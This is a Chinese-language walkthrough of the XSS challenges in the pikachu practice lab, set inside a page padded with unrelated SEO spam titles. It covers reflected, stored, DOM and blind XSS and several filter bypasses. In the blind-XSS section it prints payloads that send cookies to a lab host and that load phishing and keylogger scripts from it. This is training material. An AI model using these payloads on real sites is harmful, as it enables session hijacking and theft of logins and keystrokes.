当前位置: 首页 > news >正文

广州做模板网站的公司上海专业排名优化公司

广州做模板网站的公司,上海专业排名优化公司,品牌策划公司介绍,国外服务器网站打开慢pikachu - Cross-Site Scripting(XSS) 声明! 笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人无关,切勿触碰法律底线,否则后果自负&#x…

pikachu - Cross-Site Scripting(XSS)

声明!

笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人无关,切勿触碰法律底线,否则后果自负!!!!

题记

XSS(跨站脚本)概述Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:

1.反射型XSS;
2.存储型XSS;
3.DOM型XSS;

XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:
输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

你可以通过“Cross-Site Scripting”对应的测试栏目,来进一步的了解该漏洞。


反射型xss(get)

在这里插入图片描述

我们输入123,并查看一下源代码,可以看到123已经在前端页面出现了。

那么我们输入一下123<script>看看会出现什么

在这里插入图片描述

可以看到,123<script>在前端中显示为“who is 123”,后边的“i don’t care!”则消失了。这说明<script>标签已经被执行了,那么我们可以直接构造XSS注入

<script>alert (1)</script>

但是这时候我们发现一件事情,那就是输入框有字符限制,导致无法构造完整的XSS注入代码。

但是由于这种字符字数限制,一般都是由前端进行验证,所以我们可以通过打开开发者工具修改前端源代码来解除一下字符输入的限制。

在这里插入图片描述

在这里插入图片描述

这时候再输入之前构造的XSS注入代码就能成功注入了,但是需要注意的是,由于前端代码修改只是临时性的,所以每次刷新,都需要重新修改字符限制,才能输入完整的XSS注入代码。

反射性xss(post)

在这里插入图片描述

在第二个模式,以POST方式提交中,发现输入XSS注入代码并没有效果,那就需要考虑一下,这是个登录框,是否成功登录之后还有新的页面?这里用了上一篇文章 pikachu - 暴力破解 爆破出来的账号密码来登录,发现三个账号都可以,这里我们使用 admin/123456 来登录。

在这里插入图片描述

登录之后,我们随便输入然后提交,再抓个包

在这里插入图片描述

能够看到,这是一个POST包,那对于注入来说,它与GET包会有不同吗?并不会,我们输入构造好的XSS注入代码

<script>alert (1)</script>

在这里插入图片描述

可以看到,依然是能注入成功的。

存储型xss

在这里插入图片描述

存储型与反射型最大的区别在于反射型是无法存储,只能通过诱骗点击链接来进行触发,而存储型则是永久存储,被写入数据库的,只要用户浏览到被写入XSS注入的代码,XSS注入就会生效。而XSS注入可以隐藏在一段文字中,也可以隐藏在图片中,它的触发方式也很多,可以通过鼠标点击甚至是鼠标有经过就能触发。

这里我们构造一个鼠标点击就会生效的XSS注入,可以发现不管刷新多少次,这个注入都存在。

<img src=1 οnclick=alert('xss')>

在这里插入图片描述

DOM型xss

DOM型XSS(跨站脚本攻击)是基于文档对象模型(Document Object Model,简称DOM)的一种漏洞。DOM是HTML文档的对象表示,它允许程序和脚本动态访问和更新文档的内容、结构和样式。DOM型XSS的特点是攻击者通过修改页面的DOM节点来注入恶意脚本,整个过程在客户端完成,不需要与服务器进行交互。

与传统的反射型和存储型XSS不同,DOM型XSS的攻击脚本不会被发送到服务器,而是在浏览器中通过JavaScript操作DOM时执行。这种攻击方式使得DOM型XSS难以被传统的Web应用防火墙(WAF)检测到。

我们正常输入一个字符串,然后用F12检查一下源代码

在这里插入图片描述

可以发现,这是一个超链接的标签,我们输入作为引用对象。

那么我们可以闭合引用,然后通过 onclick 属性来构造XSS注入,使用双引号"和单引号’测试,发现单引号可以进行闭合。

' οnclick="alert ('xss')"

在这里插入图片描述

DOM型xss-x

DOM-XSS-X 是一种特殊的跨站脚本攻击(XSS)类型,它结合了反射型XSS和DOM型XSS的特点。具体来说,DOM-XSS-X 通常涉及到从浏览器的URL中获取输入数据,然后通过JavaScript操作DOM来执行恶意脚本。这种攻击方式类似于反射型XSS,因为它通过URL参数传递恶意代码,但与反射型XSS不同的是,DOM-XSS-X 的执行过程完全在客户端进行,不需要服务器的参与。

在DOM-XSS-X 中,攻击者构造一个包含恶意脚本的URL,用户访问该URL时,JavaScript代码会从URL中提取参数,并将其插入到DOM中执行。由于整个过程不涉及服务器,因此这种攻击方式难以被传统的Web应用防火墙(WAF)检测到。

我们同样输入123然后按F12检查源代码,发现一开始会弹出“有些费尽心机想要忘记的事情,后来真的就忘掉了”的超链接,点击后生成新的超链接“就让往事都随风,都随风吧”,而这个超链接所引用的对象便是我们的输入。

在这里插入图片描述

那我们就可以按照之前的方法来进行,依然构造XSS注入

' οnclick="alert ('xss')"

在这里插入图片描述

xss盲打

在这里插入图片描述

什么叫盲打?顾名思义,就是在不知道是否能有返回结果的情况下,去进行注入。

我们测试一下,这里是否能进行注入。

<img src=1 onclick="alert ('1')">

在这里插入图片描述

然后我们再进入管理后台查看一下,后台地址是 IP:Port/vul/xss/xssblind/admin.php,账号/密码是admin/123456

在这里插入图片描述

说明xss注入被执行了,但是如果不登录管理后台的话,我们没有回显,也不清楚到底注入没,只是发个弹窗注入,貌似也起不了多大作用?

我们把页面往下拉,可以发现一个XSS后台

在这里插入图片描述

它具有三大模块,也是我们在模拟攻击中常用的手段cookie搜集、钓鱼结果、键盘记录

在这里插入图片描述

我们先进入cookie搜集模块,记下链接。当然,一开始是不知道?cookie作为传值,但是在目录文件中\pikachu\pkxss\xcookie\cookie.php可以看到

在这里插入图片描述

然后构造一个XSS注入代码

<script>document.location = 'http://192.168.42.142/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

接着我们回到XSS盲打模块

在这里插入图片描述

点击提交后,我们去管理后台刷新一下网页,然后再回到获取cookie结果模块,可以发现,cookie已被成功接收

在这里插入图片描述

我们接着来测试一下钓鱼模块

在这里插入图片描述

同样的,这里我们直接构造一个利用代码就行

<script src="http://192.168.42.142/pkxss/xfish/fish.php"></script>

但是这里我们需要去文件\pikachu\pkxss\xfish\fish.php修改一下,将IP改为我们自己的IP

在这里插入图片描述

我们把它用留言板提交,看看管理后台出现了什么

在这里插入图片描述

可以看到有一个登录框,我们输入admin/admin看看

在这里插入图片描述

可以看到,我们的输入已被抓取

接着测试一下获取键盘记录结果

同样的,我们先去\pikachu\pkxss\rkeypress\rk.js文件里改一下配置

在这里插入图片描述

然后构造XSS注入代码

<script src="http://192.168.42.142/pkxss/rkeypress/rk.js">123</script>

在这里插入图片描述

接着我们再管理后台随便输入一些字符串,再切回pikachu Xss 获取键盘记录结果的网页

在这里插入图片描述

可以看到,键盘的输入已经被抓取成功了

xss之过滤

在这里插入图片描述

我们先正常构造一个XSS注入代码,看看会显示什么

在这里插入图片描述

可以看到,'>'被过滤了,那么我们怎么绕过?

这时候就要说一下HTML和JavaScript的解析机制了。当浏览器解析HTML时,它会尝试将输入的文本视为有效的HTML代码,即使这些代码没有明确的闭合标签。

例如,如果你在HTML中输入<div>Hello</div>,浏览器会自动闭合这个

标签,即使你没有显式地写上闭合标签 </div>。这种机制被称为HTML的自我闭合特性‌。

所以我们构造一个没有’>'的XSS注入代码,便可以完美绕过

<img src=1 οnclick="alert ('1')"

在这里插入图片描述

xss之htmlspecialchars

在进行XSS注入代码的构造前,我们应该先了解一下htmlspecialchars()函数是什么。

htmlspecialchars() 是一个 PHP 函数,用于将字符串中的特殊字符转换为 HTML 实体。这样可以防止用户输入的文本被浏览器解释为 HTML 或 JavaScript 代码,从而防止跨站脚本攻击(XSS)。

参数
  • string:必需。要转换的字符串。

  • flags:可选。指定要转换哪些特殊字符。常用的值有:

    • ENT_COMPAT​:默认值。转换双引号为 &quot;​,不转换单引号。
    • ENT_QUOTES​:转换双引号和单引号。
    • ENT_NOQUOTES​:不转换任何引号.
  • encoding:可选。指定字符集,默认为 UTF-8​。

  • double_encode:可选。如果设置为 true​,则已转换的 HTML 实体将被再次转换。默认为 true​。

默认要求
  • flags:默认为 ENT_COMPAT​,即只转换双引号,不转换单引号。
  • encoding:默认为 UTF-8​。
  • double_encode:默认为 true​,即已转换的 HTML 实体将被再次转换。

所以现在我们可以清楚的知道,htmlspecialchars()函数会对输入的字符串中的特殊字符转换为HTML实体,但是它默认只转换双引号,不转换单引号,这就给了我们绕过的可能,我们构造一下只有单引号的XSS注入代码。

<img src=1 onclick='alert (1)'>

在这里插入图片描述

我们发现,我们的输入包含在超链接标签里,那么我们首先闭合标签,再重新构造一下

' οnclick='alert (1)'

在这里插入图片描述

xss之href输出

在这里插入图片描述

可以看到,我们的输入的特殊符号都被当做超链接的对象,没法进行闭合,那么我们该怎么绕过?这里提一下JavaScript历史遗留的特性。

在早期的 Web 技术中,JavaScript 的使用并不像现在这样普遍和强大。将 JavaScript 代码直接嵌入到 HTML 属性中(如 href)提供了一种简单的方式来实现一些基本的交互功能,而无需编写复杂的脚本或事件处理程序。

这种方法允许开发者在不使用 onclick 事件的情况下,通过点击链接来触发 JavaScript 代码的执行。javascript协议被引入作为一种允许在 URL 中嵌入 JavaScript 代码的方式。虽然它最初是为了解决一些特定的用例,但随着时间的推移,它被广泛用于各种场景,包括在 href 中使用。

那么在这里,我们就可以通过JavaScript特性来进行绕过

javascript:alert('1')

在这里插入图片描述

xss之js输出

在这里插入图片描述

尝试输入的字符串都被过滤了,只留下了这么一句话,那么我们该如何绕过?观察一下,在红框位置,是使用双引号进行闭合的,那么我们是否可以通过双引号来进行闭合?我们试一下。

"<script>alert (1)</script>

在这里插入图片描述

很尴尬,输入被吃了。这时候我们脑筋转一下,会不会是因为<script>没有闭合的原因?导致输入不被执行。我们闭合一下</script>

"</script><script>alert (1)</script>

在这里插入图片描述

成功弹出

http://www.tj-hxxt.cn/news/45034.html

相关文章:

  • 抖音网站表白怎么做最好看免费观看高清视频了
  • 站点搭建如何提高seo关键词排名
  • 龙川做网站的百度seo视频教程
  • 智慧团建官方网站电脑版微信营销软件排行榜
  • 找人做网站骗局b站视频推广网站2023年
  • 南京制作企业网站品牌推广策划方案
  • 网站建设 移动端网络服务器配置与管理
  • 小说网站开发需求中国十大外贸平台
  • 静态网站有哪些优点logo设计
  • opkg 做网站的包叫什么名字微信推广软件有哪些
  • 做平面设计常用的网站做网站平台需要多少钱
  • 做购物平台网站 民治google play官网下载
  • 网站供应商代发怎么做河南制作网站公司
  • 建立网站域名的费用关键对话
  • 淘宝客网站返利程序百度搜索风云榜明星
  • 滕州网站设计seo线上培训班
  • 商标logo免费设计在线生成成都做整站优化
  • 免费二级域名申请苏州seo按天扣费
  • 青岛做教育的网站建设详情页设计
  • 徐州做外贸网站北京百度公司总部电话
  • 广告设计公司业务范围网站关键词优化软件
  • 健身网站开发项目总结重庆seo推广
  • 买域名需要备案吗seo刷关键词排名免费
  • 企业网站建设的文章小红书广告投放平台
  • 翻墙在线代理网站优化费用报价明细
  • 制作企业网站的秘诀肇庆网站推广排名
  • 旅游网站的后台管理系统怎么做百度排名点击器
  • 老外做牛排的视频网站网站快速有排名
  • 帮别人做网站规划北京做网站的公司有哪些
  • 接私活做网站设计朋友圈网络营销